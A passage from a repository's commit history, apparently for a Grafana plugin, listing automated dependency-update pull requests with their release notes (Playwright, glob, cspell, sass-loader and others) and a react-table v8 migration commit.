<219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
7eb80d3f23 |
chore(deps): update dependency eslint-plugin-jsdoc to v62 (#2188)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-jsdoc](https://redirect.github.com/gajus/eslint-plugin-jsdoc) | [`61.5.0` → `62.0.0`](https://renovatebot.com/diffs/npm/eslint-plugin-jsdoc/61.5.0/62.0.0) |  |  | --- ### Release Notes <details> <summary>gajus/eslint-plugin-jsdoc (eslint-plugin-jsdoc)</summary> ### [`v62.0.0`](https://redirect.github.com/gajus/eslint-plugin-jsdoc/releases/tag/v62.0.0) [Compare Source](https://redirect.github.com/gajus/eslint-plugin-jsdoc/compare/v61.7.1...v62.0.0) ##### Features - update jsdoccomment, allowing for `skipInvokedExpressionsForCommentFinding` setting; fixes [#​1624](https://redirect.github.com/gajus/eslint-plugin-jsdoc/issues/1624) ([9c0e4a3]( |
||
|
renovate-sh-app[bot]
|
0316e42c8b |
chore(deps): pin dependencies (#2173)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [@testing-library/dom](https://redirect.github.com/testing-library/dom-testing-library) | devDependencies | pin | [`^10.4.1` → `10.4.1`](https://renovatebot.com/diffs/npm/@testing-library%2fdom/10.4.1/10.4.1) | | alpine | | pinDigest | → `865b95f` | | grafana/grafana-enterprise | final | pinDigest | → `703b4a3` | | postgres | | pinDigest | → `056b54f` | | postgres | | pinDigest | → `a7711af` | | postgres | | pinDigest | → `5fd97d3` | | python | final | pinDigest | → `cfa6231` | | python | final | pinDigest | → `0c5171f` | | python | final | pinDigest | → `411fa4d` | | python | final | pinDigest | → `6d58c1a` | | redis | | pinDigest | → `6cbef35` | | zabbix/zabbix-agent | | pinDigest | → `2a5989f` | | zabbix/zabbix-agent | | pinDigest | → `0bb96e2` | | zabbix/zabbix-agent | | pinDigest | → `71f1f22` | | zabbix/zabbix-agent | | pinDigest | → `9eab77e` | | zabbix/zabbix-agent | | pinDigest | → `c34ca68` | | zabbix/zabbix-proxy-sqlite3 | | pinDigest | → `a963b30` | | zabbix/zabbix-server-pgsql | | pinDigest | → `a6f748d` | | zabbix/zabbix-server-pgsql | | pinDigest | → `5c1aece` | | zabbix/zabbix-server-pgsql | | pinDigest | → `b3c1451` | | zabbix/zabbix-server-pgsql | | pinDigest | → `dbc5a2a` | | zabbix/zabbix-server-pgsql | | pinDigest | → `b88c636` | | zabbix/zabbix-web-apache-pgsql | | pinDigest | → `9b5ad53` | | zabbix/zabbix-web-apache-pgsql | | pinDigest | → `70a301e` | | zabbix/zabbix-web-nginx-pgsql | | pinDigest | → `08b2b13` | | zabbix/zabbix-web-nginx-pgsql | | pinDigest | → `e034dd9` | | zabbix/zabbix-web-nginx-pgsql | | pinDigest | → `90d9d85` | Add the preset `:preserveSemverRanges` to your config if you don't want to pin your dependencies. --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZG9ja2VyIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Jocelyn Collado-Kuri <jcolladokuri@icloud.com> |
||
|
renovate-sh-app[bot]
|
f3fa2522e7 |
chore(deps): update dependency @types/react-dom to v18.3.7 (#2174)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/react-dom](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react-dom) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react-dom)) | [`18.3.1` → `18.3.7`](https://renovatebot.com/diffs/npm/@types%2freact-dom/18.3.1/18.3.7) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
ismail simsek
|
1bb5e8a5dd |
chore: bump @grafana/create-plugin configuration to 6.7.1 (#2167)
Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
ismail simsek
|
da27b9a917 |
chore(deps): update various dependencies (#2166)
yarn 4.9.4 -> 4.12.0 glob 11.1.0 -> 13.0.0 js-yaml 4.1.0 -> 4.1.1 |
||
|
renovate-sh-app[bot]
|
76c7603a4c |
chore(deps): update dependency cspell to v6.31.3 (#2165)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [cspell](https://cspell.org/) ([source](https://redirect.github.com/streetsidesoftware/cspell/tree/HEAD/packages/cspell)) | [`6.13.3` → `6.31.3`](https://renovatebot.com/diffs/npm/cspell/6.13.3/6.31.3) |  |  | --- ### Release Notes <details> <summary>streetsidesoftware/cspell (cspell)</summary> ### [`v6.31.3`](https://redirect.github.com/streetsidesoftware/cspell/releases/tag/v6.31.3) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3) #### What's Changed - fix: Fix dynamic loader on Windows by [@​Jason3S](https://redirect.github.com/Jason3S) in [#​4707](https://redirect.github.com/streetsidesoftware/cspell/pull/4707) **Full Changelog**: <https://github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3> ### [`v6.31.2`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6312-2023-04-14) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.1...v6.31.2) **Note:** Version bump only for package cspell ### [`v6.31.1`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6311-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.0...v6.31.1) **Note:** Version bump only for package cspell ### [`v6.31.0`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6310-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.30.2...v6.31.0) **Note:** Version bump only for package cspell #### 6.30.2 (2023-03-18) ##### Bug Fixes - lock cosmiconfig to 8.0.0 ([#​4335](https://redirect.github.com/streetsidesoftware/cspell/issues/4335)) ([0f37e2c]( |
||
|
renovate-sh-app[bot]
|
4eb55efa59 |
chore(deps): update dependency @playwright/test to ^1.55.0 (#2156)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@playwright/test](https://playwright.dev) ([source](https://redirect.github.com/microsoft/playwright)) | [`^1.52.0` → `^1.55.0`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.55.0/1.57.0) |  |  | --- ### Release Notes <details> <summary>microsoft/playwright (@​playwright/test)</summary> ### [`v1.57.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.57.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.1...v1.57.0) #### Speedboard In HTML reporter, there's a new tab we call "Speedboard": <img width="600" alt="speedboard" src="https://github.com/user-attachments/assets/4ba117ea-ea94-4b6a-82b2-8bbd00dfe81c" /> It shows you all your executed tests sorted by slowness, and can help you understand where your test suite is taking longer than expected. Take a look at yours - maybe you'll find some tests that are spending a longer time waiting than they should! #### Chrome for Testing Starting with this release, Playwright switches from Chromium, to using [Chrome for Testing](https://developer.chrome.com/blog/chrome-for-testing/) builds. Both headed and headless browsers are subject to this. Your tests should still be passing after upgrading to Playwright 1.57. We're expecting no functional changes to come from this switch. The biggest change is the new icon and title in your toolbar. <img width="500" alt="new and old logo" src="https://github.com/user-attachments/assets/e9a5c4f2-9f35-4c27-9382-0f5eda377097" /> If you still see an unexpected behaviour change, please [file an issue](https://redirect.github.com/microsoft/playwright/issues/new). On Arm64 Linux, Playwright continues to use Chromium. #### Waiting for webserver output [testConfig.webServer](https://playwright.dev/docs/api/class-testconfig#test-config-web-server) added a `wait` field. Pass a regular expression, and Playwright will wait until the webserver logs match it. ```js import { defineConfig } from '@​playwright/test'; export default defineConfig({ webServer: { command: 'npm run start', wait: { stdout: '/Listening on port (?<my_server_port>\\d+)/' }, }, }); ``` If you include a named capture group into the expression, then Playwright will provide the capture group contents via environment variables: ```js import { test, expect } from '@​playwright/test'; test.use({ baseUrl: `http://localhost:${process.env.MY_SERVER_PORT ?? 3000}` }); test('homepage', async ({ page }) => { await page.goto('/'); }); ``` This is not just useful for capturing varying ports of dev servers. You can also use it to wait for readiness of a service that doesn't expose an HTTP readiness check, but instead prints a readiness message to stdout or stderr. #### Breaking Change After 3 years of being deprecated, we removed `Page#accessibility` from our API. Please use other libraries such as [Axe](https://www.deque.com/axe/) if you need to test page accessibility. See our Node.js [guide](https://playwright.dev/docs/accessibility-testing) for integration with Axe. #### New APIs - New property [testConfig.tag](https://playwright.dev/docs/api/class-testconfig#test-config-tag) adds a tag to all tests in this run. This is useful when using [merge-reports](https://playwright.dev/docs/test-sharding#merging-reports-from-multiple-shards). - [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console) event is emitted when JavaScript within the worker calls one of console API methods, e.g. console.log or console.dir. [worker.waitForEvent()](https://playwright.dev/docs/api/class-worker#worker-wait-for-event) can be used to wait for it. - [locator.description()](https://playwright.dev/docs/api/class-locator#locator-description) returns locator description previously set with [locator.describe()](https://playwright.dev/docs/api/class-locator#locator-describe), and `Locator.toString()` now uses the description when available. - New option [`steps`](https://playwright.dev/docs/api/class-locator#locator-click-option-steps) in [locator.click()](https://playwright.dev/docs/api/class-locator#locator-click) and [locator.dragTo()](https://playwright.dev/docs/api/class-locator#locator-drag-to) that configures the number of `mousemove` events emitted while moving the mouse pointer to the target element. - Network requests issued by [Service Workers](https://playwright.dev/docs/service-workers#network-events-and-routing) are now reported and can be routed through the [BrowserContext](https://playwright.dev/docs/api/class-browsercontext), only in Chromium. You can opt out using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_NETWORK` environment variable. - Console messages from Service Workers are dispatched through [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console). You can opt out of this using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_CONSOLE` environment variable. #### Browser Versions - Chromium 143.0.7499.4 - Mozilla Firefox 144.0.2 - WebKit 26.0 ### [`v1.56.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.0...v1.56.1) #### Highlights [#​37871](https://redirect.github.com/microsoft/playwright/issues/37871) chore: allow local-network-access permission in chromium [#​37891](https://redirect.github.com/microsoft/playwright/issues/37891) fix(agents): remove workspaceFolder ref from vscode mcp [#​37759](https://redirect.github.com/microsoft/playwright/issues/37759) chore: rename agents to test agents [#​37757](https://redirect.github.com/microsoft/playwright/issues/37757) chore(mcp): fallback to cwd when resolving test config #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.56.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.1...v1.56.0) #### Playwright Agents Introducing Playwright Agents, three custom agent definitions designed to guide LLMs through the core process of building a Playwright test: - **🎭 planner** explores the app and produces a Markdown test plan - **🎭 generator** transforms the Markdown plan into the Playwright Test files - **🎭 healer** executes the test suite and automatically repairs failing tests Run `npx playwright init-agents` with your client of choice to generate the latest agent definitions: ```bash # Generate agent files for each agentic loop # Visual Studio Code npx playwright init-agents --loop=vscode # Claude Code npx playwright init-agents --loop=claude # opencode npx playwright init-agents --loop=opencode ``` > \[!NOTE] > VS Code v1.105 (currently on the VS Code Insiders channel) is needed for the agentic experience in VS Code. It will become stable shortly, we are a bit ahead of times with this functionality! [Learn more about Playwright Agents](https://playwright.dev/docs/test-agents) #### New APIs - New methods [page.consoleMessages()](https://playwright.dev/docs/api/class-page#page-console-messages) and [page.pageErrors()](https://playwright.dev/docs/api/class-page#page-page-errors) for retrieving the most recent console messages from the page - New method [page.requests()](https://playwright.dev/docs/api/class-page#page-requests) for retrieving the most recent network requests from the page - Added [`--test-list` and `--test-list-invert`](https://playwright.dev/docs/test-cli#test-list) to allow manual specification of specific tests from a file #### UI Mode and HTML Reporter - Added option to `'html'` reporter to disable the "Copy prompt" button - Added option to `'html'` reporter and UI Mode to merge files, collapsing test and describe blocks into a single unified list - Added option to UI Mode mirroring the `--update-snapshots` options - Added option to UI Mode to run only a single worker at a time #### Breaking Changes - Event [browserContext.on('backgroundpage')](https://playwright.dev/docs/api/class-browsercontext#browser-context-event-background-page) has been deprecated and will not be emitted. Method [browserContext.backgroundPages()](https://playwright.dev/docs/api/class-browsercontext#browser-context-background-pages) will return an empty list #### Miscellaneous - Aria snapshots render and compare `input` `placeholder` - Added environment variable `PLAYWRIGHT_TEST` to Playwright worker processes to allow discriminating on testing status #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.55.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.55.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.0...v1.55.1) ##### Highlights [#​37479](https://redirect.github.com/microsoft/playwright/issues/37479) - \[Bug]: Upgrade Chromium to 140.0.7339.186. [#​37147](https://redirect.github.com/microsoft/playwright/issues/37147) - \[Regression]: Internal error: step id not found. [#​37146](https://redirect.github.com/microsoft/playwright/issues/37146) - \[Regression]: HTML reporter displays a broken chip link when there are no projects. [#​37137](https://redirect.github.com/microsoft/playwright/pull/37137) - Revert "fix(a11y): track inert elements as hidden". [#​37532](https://redirect.github.com/microsoft/playwright/pull/37532) - chore: do not use -k option #### Browser Versions - Chromium 140.0.7339.186 - Mozilla Firefox 141.0 - WebKit 26.0 This version was also tested against the following stable channels: - Google Chrome 139 - Microsoft Edge 139 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [x] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Sriram <153843+yesoreyeram@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
f3c5a15a20 |
chore(deps): update dependency @grafana/plugin-e2e to ^2.2.3 (#2155)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@grafana/plugin-e2e](https://redirect.github.com/grafana/plugin-tools) ([source](https://redirect.github.com/grafana/plugin-tools/tree/HEAD/packages/plugin-e2e)) | [`^2.1.12` → `^2.2.3`](https://renovatebot.com/diffs/npm/@grafana%2fplugin-e2e/2.1.12/2.2.3) |  |  | --- ### Release Notes <details> <summary>grafana/plugin-tools (@​grafana/plugin-e2e)</summary> ### [`v2.2.3`](https://redirect.github.com/grafana/plugin-tools/releases/tag/%40grafana/plugin-e2e%402.2.3) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.2...@grafana/plugin-e2e@2.2.3) ##### 🐛 Bug Fix - CreatePlugin: Adding step about health check functionality in ds tutorial. [#​2222](https://redirect.github.com/grafana/plugin-tools/pull/2222) ([@​mckn](https://redirect.github.com/mckn)) ##### Authors: 1 - Marcus Andersson ([@​mckn](https://redirect.github.com/mckn)) ### [`v2.2.2`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) ### [`v2.2.1`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v221-Thu-Oct-09-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.0...@grafana/plugin-e2e@2.2.1) ##### 🐛 Bug Fix - E2E: fix for flakiness in PanelEditPage.refreshPanel [#​2207](https://redirect.github.com/grafana/plugin-tools/pull/2207) ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) ##### Authors: 1 - Hugo Häggmark ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) *** ### [`v2.2.0`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v220-Tue-Oct-07-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.14...@grafana/plugin-e2e@2.2.0) ##### 🚀 Enhancement - Plugin E2E: Add support for specifying user preferences [#​2131](https://redirect.github.com/grafana/plugin-tools/pull/2131) ([@​sunker](https://redirect.github.com/sunker)) ##### Authors: 1 - Erik Sundell ([@​sunker](https://redirect.github.com/sunker)) *** ### [`v2.1.14`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v2114-Mon-Sep-29-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.13...@grafana/plugin-e2e@2.1.14) ##### 🐛 Bug Fix - Update dependency uuid to v13 [#​2139](https://redirect.github.com/grafana/plugin-tools/pull/2139) ([@​renovate\[bot\]](https://redirect.github.com/renovate\[bot])) ##### Authors: 1 - [@​renovate\[bot\]](https://redirect.github.com/renovate\[bot]) *** ### [`v2.1.13`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
dependabot[bot]
|
3d631aedd7 |
Bump glob from 10.4.5 to 11.1.0 (#2153)
Bumps [glob](https://github.com/isaacs/node-glob) from 10.4.5 to 11.1.0. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/isaacs/node-glob/blob/main/changelog.md">glob's changelog</a>.</em></p> <blockquote> <h1>changeglob</h1> <h2>13</h2> <ul> <li>Move the CLI program out to a separate package, <code>glob-bin</code>. Install that if you'd like to continue using glob from the command line.</li> </ul> <h2>12</h2> <ul> <li>Remove the unsafe <code>--shell</code> option. The <code>--shell</code> option is now ONLY supported on known shells where the behavior can be implemented safely.</li> </ul> <h2>11.1</h2> <p><a href="https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2">GHSA-5j98-mcp5-4vw2</a></p> <ul> <li>Add the <code>--shell</code> option for the command line, with a warning that this is unsafe. (It will be removed in v12.)</li> <li>Add the <code>--cmd-arg</code>/<code>-g</code> as a way to <em>safely</em> add positional arguments to the command provided to the CLI tool.</li> <li>Detect commands with space or quote characters on known shells, and pass positional arguments to them safely, avoiding <code>shell:true</code> execution.</li> </ul> <h2>11.0</h2> <ul> <li>Drop support for node before v20</li> </ul> <h2>10.4</h2> <ul> <li>Add <code>includeChildMatches: false</code> option</li> <li>Export the <code>Ignore</code> class</li> </ul> <h2>10.3</h2> <ul> <li>Add <code>--default -p</code> flag to provide a default pattern</li> <li>exclude symbolic links to directories when <code>follow</code> and <code>nodir</code> are both set</li> </ul> <h2>10.2</h2> <ul> <li>Add glob cli</li> </ul> <h2>10.1</h2> <ul> <li>Return <code>'.'</code> instead of the empty string <code>''</code> when the current working directory is returned as a match.</li> <li>Add <code>posix: true</code> option to return <code>/</code> delimited paths, even on</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
4eece4b75e |
chore(deps): update dependency terser-webpack-plugin to ^5.3.14 (#2154)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [terser-webpack-plugin](https://redirect.github.com/webpack/terser-webpack-plugin) | [`^5.3.10` → `^5.3.14`](https://renovatebot.com/diffs/npm/terser-webpack-plugin/5.3.14/5.3.16) |  |  | --- ### Release Notes <details> <summary>webpack/terser-webpack-plugin (terser-webpack-plugin)</summary> ### [`v5.3.16`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5316-2025-12-11) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.15...v5.3.16) ### [`v5.3.15`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5315-2025-12-05) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.14...v5.3.15) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
02a323b142 |
chore(deps): update dependency semver to ^7.7.2 (#2147)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [semver](https://redirect.github.com/npm/node-semver) | [`^7.6.3` → `^7.7.2`](https://renovatebot.com/diffs/npm/semver/7.7.2/7.7.3) |  |  | --- ### Release Notes <details> <summary>npm/node-semver (semver)</summary> ### [`v7.7.3`](https://redirect.github.com/npm/node-semver/blob/HEAD/CHANGELOG.md#773-2025-10-06) [Compare Source](https://redirect.github.com/npm/node-semver/compare/v7.7.2...v7.7.3) ##### Bug Fixes - [`e37e0ca`]( |
||
|
renovate-sh-app[bot]
|
b7a953b178 |
chore(deps): update dependency style-loader to v3.3.4 (#2151)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[style-loader](https://redirect.github.com/webpack-contrib/style-loader)
| [`3.3.3` →
`3.3.4`](https://renovatebot.com/diffs/npm/style-loader/3.3.3/3.3.4) |
|
|
---
### Release Notes
<details>
<summary>webpack-contrib/style-loader (style-loader)</summary>
###
[`v3.3.4`](https://redirect.github.com/webpack/style-loader/releases/tag/v3.3.4)
[Compare
Source](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
#####
[3.3.4](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
(2024-01-09)
##### Bug Fixes
- css experiments logic
([c12e70b](
|
||
|
renovate-sh-app[bot]
|
c02767b1c3 |
chore(deps): update dependency sass-loader to v13.3.3 (#2146)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [sass-loader](https://redirect.github.com/webpack/sass-loader) | [`13.3.1` -> `13.3.3`](https://renovatebot.com/diffs/npm/sass-loader/13.3.1/13.3.3) |  |  | --- ### Release Notes <details> <summary>webpack/sass-loader (sass-loader)</summary> ### [`v13.3.3`](https://redirect.github.com/webpack/sass-loader/blob/HEAD/CHANGELOG.md#1400-2024-01-15) [Compare Source](https://redirect.github.com/webpack/sass-loader/compare/v13.3.2...v13.3.3) ##### ⚠ BREAKING CHANGES - removed `fibers` support - minimum supported Node.js version is `18.12.0` ([627f55d]( |
||
|
ismail simsek
|
cc492b916d |
Update react-table to v8 (#2131)
Updating react-table to v8. - Migrating the existing table to v8 - Preserving the visuals and logic What's done? - Cell components are moved under `Cells` folder - Old styles for react-table-6 is removed. - Old types are removed - All logic was preserved - Some cell components are removed for simplicity Fixes: https://github.com/grafana/oss-big-tent-squad/issues/125 |
||
|
renovate-sh-app[bot]
|
b11f2b1902 |
chore(deps): update dependency @types/node to ^20.19.16 (#2105)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | [`^20.8.7` -> `^20.19.16`](https://renovatebot.com/diffs/npm/@types%2fnode/20.19.16/20.19.25) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzguNSIsInVwZGF0ZWRJblZlciI6IjQxLjEzOC41IiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJ1cGRhdGUtcGF0Y2giXX0=--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
f858259eaf |
chore(deps): update dependency @babel/core to ^7.28.4 (#2126)
